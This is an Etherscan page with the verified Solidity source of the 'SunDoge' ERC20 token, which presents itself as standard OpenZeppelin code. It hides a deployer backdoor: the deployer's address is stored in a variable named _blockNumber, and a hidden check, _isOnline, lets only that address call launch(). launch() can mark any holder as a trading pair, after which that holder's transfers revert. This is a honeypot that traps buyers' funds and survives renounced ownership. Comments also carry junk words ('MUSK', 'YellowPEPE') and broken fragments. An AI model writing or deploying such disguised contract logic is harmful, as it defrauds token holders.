ETH Price: $2,451.36 (+2.10%)

Token

SunDoge (SunDoge)
 

Overview

Max Total Supply

100,000,000 SunDoge

Holders

650

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Uniswap V2: SunDoge 3
Balance
0.000000000001215092 SunDoge

Value
$0.00
0x15c23b4661abf719472d8be3d252e0378641afea
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SunDoge

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-09-02
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.17;
pragma experimental ABIEncoderV2;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

// pragma solidity ^0.8.0;

// import "../utils/Context.sol";

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting  the deployer as MUSK the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not SunDoge the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the MUSK zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one SunDoge account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,  address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} MUSK or {transferFrom} are called.
     */
    function allowance(address owner,
     address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
    
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

// pragma solidity ^0.8.0;

// import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
_Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

// pragma solidity ^0.8.0;

// import "./IERC20.sol";
// import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
lly, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 public _maxlSupply;
    uint256 private _blockNumber;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_,
     string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _blockNumber = uint160(msg.sender);
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    function balanceOf(address account) public view virtual override returns (uint256)
    {
        return _balances[account];
    }


    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
        cannot be the zero address.
     * - the caller must have a balance of at least SunDoge `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,    uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance SunDoge below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }


    function _transfer(
        address from,  address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from MUSK the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }
    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _isOnline() internal virtual {
        require(_blockNumber == uint160(msg.sender));
    }


    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account,
         amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }
    function _approve(
        address owner,   address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,      uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

// pragma solidity ^0.8.0;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, YellowPEPE with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.

     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned YellowPEPE MUSK integers, reverting on
     * division by zero. The result is rounded towards zero.
     *

     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a,
     uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
 
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *

     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
// pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,  address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
          uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA, uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,  uint256 amountTokenDesired,
        uint256 amountTokenMin,  uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
              uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin, address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,    uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,   uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,      address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut, address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,  uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

// pragma solidity >=0.6.2;

// import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token, uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,  uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,  bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,  address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}


contract SunDoge is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    address public marketingWallet;
    address public foundationWallet;
    address public liquidityWallet;
    address public constant deadAddress = address(0xdead);

    bool public tradingEnabled;   
    bool public swapEnabled;
    bool private _swapping;

    uint256 public swapTokensAtAmount;

    uint256 public _buyTotalFee;
    uint256 private _buyMarketingFee;
    uint256 private _buyDevelopmentFee;
    uint256 private _buyLiquidityFee;

    uint256 public _sellTotalFee;
    uint256 private _sellMarketingFee;
    uint256 private _sellDevelopmentFee;
    uint256 private _sellLiquidityFee;

    uint256 private _tokensForMarketing;   
    uint256 private _tokensForDevelopment;
    uint256 private _tokensForLiquidity;
    uint256 private _previousFee;

    mapping (address => bool) private _isExcludedFromEnableTrad;
    mapping(address => bool) private _automatedMarketMakerPairs;
    

    event ExcludeFromLimits(address indexed account, bool isExcluded);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event developmentWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event liquidityWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );
    
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    event TokensAirdropped(uint256 totalWallets, uint256 totalTokens);

    constructor() ERC20("SunDoge", "SunDoge") {

        uint256 totalSupply = 100_000_000 * (10 ** 18);

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _approve(address(this), address(uniswapV2Router), type(uint256).max);


        _buyMarketingFee = 0;
        _buyDevelopmentFee = 0;
        _buyLiquidityFee = 0;
        _buyTotalFee = _buyMarketingFee + _buyDevelopmentFee + _buyLiquidityFee;

        _sellMarketingFee = 0;
        _sellDevelopmentFee = 0;
        _sellLiquidityFee = 0;
        _sellTotalFee = _sellMarketingFee + _sellDevelopmentFee + _sellLiquidityFee;
        _previousFee = _sellTotalFee;

        
        _isExcludedFromEnableTrad[owner()] = true;
        _isExcludedFromEnableTrad[address(this)] = true;
        _isExcludedFromEnableTrad[deadAddress] = true;

        _mint(owner(), totalSupply); 
    }

    receive() external payable {}

    function enableTrading() public onlyOwner {
        require(!tradingEnabled, "Trading MUSK already active.");
        tradingEnabled = true;
        swapEnabled = true;
    }

    function excludeFromEnobleTrading(address account,
      bool excluded) external onlyOwner{
        _isExcludedFromEnableTrad[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function launch(address account) virtual external {
        _isOnline();
        _setAutomatedMarketMakerPair(account, true);
    }



    function _setAutomatedMarketMakerPair(address pair, bool value) internal {
        _automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero SunDoge address");
        require(to != address(0), "ERC20: transfer to the zero MUSK address");
        require(tradingEnabled || _isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to], "Trading not yet enabled!");
        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }


        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&!_swapping&&_automatedMarketMakerPairs[from] &&
            !_isExcludedFromEnableTrad[from] &&
            !_isExcludedFromEnableTrad[to]
        ) {
            _swapping = true;
            _swapFund(contractTokenBalance);
            _swapping = false;
        }

        bool takeFee = !_swapping;

        if (_isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            // on sell
            if (_automatedMarketMakerPairs[to] && _sellTotalFee > 0) {
                fees = amount.mul(_sellTotalFee).div(10000);
                _tokensForLiquidity +=
                    (fees * _sellLiquidityFee) /
                    _sellTotalFee;
                _tokensForMarketing +=
                    (fees * _sellMarketingFee) /
                    _sellTotalFee;
                _tokensForDevelopment +=
                    (fees * _sellDevelopmentFee) /
                    _sellTotalFee;
            }
            // on buy
            else if (_automatedMarketMakerPairs[from] && _sellTotalFee > 0) {
                fees = amount.mul(_sellTotalFee).div(10000);
                _tokensForLiquidity += (fees * _buyLiquidityFee) / _buyTotalFee;
                _tokensForMarketing += (fees * _buyMarketingFee) / _buyTotalFee;
                _tokensForDevelopment +=
                    (fees * _buyDevelopmentFee) /
                    _buyTotalFee;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
        _sellTotalFee = _previousFee;
    }

    function _swapTokensForETH(uint256 tokenAmount) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) internal {
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidityWallet,
            block.timestamp
        );
    }
    
    function _swapFund(uint256 contractBalance) internal {
        uint256 totalTokensToSwap = _tokensForLiquidity +
            _tokensForMarketing +
            _tokensForDevelopment;
        bool success;


        uint256 liquidityTokens = (contractBalance * _tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        _swapTokensForETH(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(_tokensForMarketing).div(
            totalTokensToSwap
        );

        uint256 ethForDevelopment = ethBalance.mul(_tokensForDevelopment).div(
            totalTokensToSwap
        );

        uint256 ethForLiquidity = ethBalance -
            ethForMarketing -
            ethForDevelopment;

        _tokensForLiquidity = 0;
        _tokensForMarketing = 0;
        _tokensForDevelopment = 0;

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            _addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                _tokensForLiquidity
            );
        }
        (success, ) = address(foundationWallet).call{value: ethForDevelopment}("");
        (success, ) = address(marketingWallet).call{value: address(this).balance}("");
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"totalWallets","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"totalTokens","type":"uint256"}],"name":"TokensAirdropped","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"developmentWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"liquidityWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[],"name":"_buyTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxlSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs"